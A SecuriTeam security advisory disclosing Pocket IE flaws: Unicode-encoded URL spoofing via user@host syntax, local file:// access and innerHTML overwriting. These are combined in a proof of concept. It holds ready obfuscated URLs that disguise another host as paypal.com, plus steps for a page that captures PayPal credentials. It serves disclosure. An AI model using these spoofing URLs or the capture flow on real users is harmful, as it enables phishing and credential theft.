The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple Pocket IE Vulnerabilities
------------------------------------------------------------------------
SUMMARY
There are several weaknesses in Pocket IE that can be used to trick end
users into submitting local and/or sensitive data, such as usernames and
passwords.
The potential for exploiting these vulnerabilities are restricted only by
an attacker's imagination.However, Pocket IE is not as powerful as its big
brother, and as such, an attacker is limited in what techniques she can
use to launch the attack. For example, Pocket IE has no support for the
IFrame tag, which is extremely useful in XSS and browser-based attacks.
In addition, Pocket IE does not support every JavaScript command commonly
used by attackers. The final example presented below is an attempt to
combine these individual flaws into one attack and is only meant to serve
as a proof of concept.
DETAILS
Flaw 1: Unicode URL Obsfucation
This particular attack is not new and has previously plagued PC-based
browsers. Pocket IE (Windows Mobile SE 2003) is also vulnerable to this
problem. In addition, Pocket IE processes the http protocol in a
<protocol>://user:pass@website format. This itself is not a problem, but
when combined with a Unicode URL it can cause confusion and mislead end
users.
Example:
http://www.airscanner.com = 69.0.200.106 =
%36%39%2E%30%2E%32%30%30%2E%31%30%36
Abuse:
http://www.paypal.com&login.rand-%00%01AE67D12EF9090AB933
@%36%39%2E%30%2E%32%30%30%2E%31%30%36/
Will take you to http://www.airscanner.com/ not http://www.paypal.com
Flaw 2: Local File Access
Pocket IE will launch local files and either load them into the browser
for viewing or launch them using their default program. This includes, but
is not limited to, the following file types (these links are subject to
OEM variations and may or may not work on your PDA). Click on each file
type to test:
* xls - file://\windows\vehicleml.pxt')/
* htc & htp (in IE) - file://\windows\clndr.htm/
* cpl items - file://\windows\backlight.cpl')/
* ini files (in IE) - file://\windows\initdb.ini')/
* 2bp images (in IE) - file://\windows\win_start.2bp')/
* go to any folder - file://\windows\startup')/
* go to 00 (root) folder - file://\%00')/
Flaw 3: <div> Tag XSS
Strictly speaking, this is not a flaw. However, it helps provide a vector
for attack, so it is worth mentioning. As it turns out, if a local file
can be loaded into a framed window in Pocket IE, and this local file
contains a named section, then that section can be overwritten from a
cojoined framed webpage. This is accomplished via JavaScript using
'innerHTML'. With this ability, the loaded local webpage can be
overwritten by a loaded remote webpage. This type of attack does not work
against webpages loaded from a remote host.
Combination Attack
The following example assumes one thing: that the attacker knows a folder
name of the temporary IE store. These folders are randomly named each time
a PDA is hard reset. Once set, they will remain as created even if
deleted. The proof of concept assumes you know this folder name, or have
access to this information. It only takes a second to browse to the
'\Windows\Profiles\guest\Temporary Internet Files\Content.IE5' directory
to learn these folder names.
This attack will demonstrate how having access to a local file can be a
problem. Via URL obfuscation, based XSS, and local file access, this
attack will demonstrate how a www.paypal.com username/password information
can be captured from an unsuspecting end user. The following steps
demonstrate this flaw. All captured information will be emailed to your
'paypal' email address...really, you can trust me.
1. Clear Pocket IE history, cookie cache, and files (Tools-->Memory in
Pocket IE) and reboot device.
2. Look up www.paypal.com into Pocket IE.
3. Open File Explorer and go to \Windows\Windows\Profiles\guest\Temporary
Internet Files\Content.IE5\ directory and locate file 'paypal[1]'. Note
the folder name.
4. Go to http://www%2Epaypal%2Ecom&login%2Erand-%00%01AE67D12EF9090AB933
@%36%39%2e%30%2e%32%30%30%2e%31%30%36/tests/ie_flaw/ie1.htm and enter
folder name when prompted (you must click this link, this takes you to
http://www.airscanner.com/tests/ie_flaw/ie1.htm, not paypal.com).
5. Let page 'load' and hit 'Yes' for certificate requests.
6. Enter username and password and submit.
You will be sent to a page that briefly shows you the captured
information, and then passed to Paypal.com for actual login.
ADDITIONAL INFORMATION
The information has been provided by <mailto:root@asylum-nz.com> kers0r.
The original article can be found at:
<http://www.airscanner.com/tests/ie_flaw/ie_attack.htm>
http://www.airscanner.com/tests/ie_flaw/ie_attack.htm
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
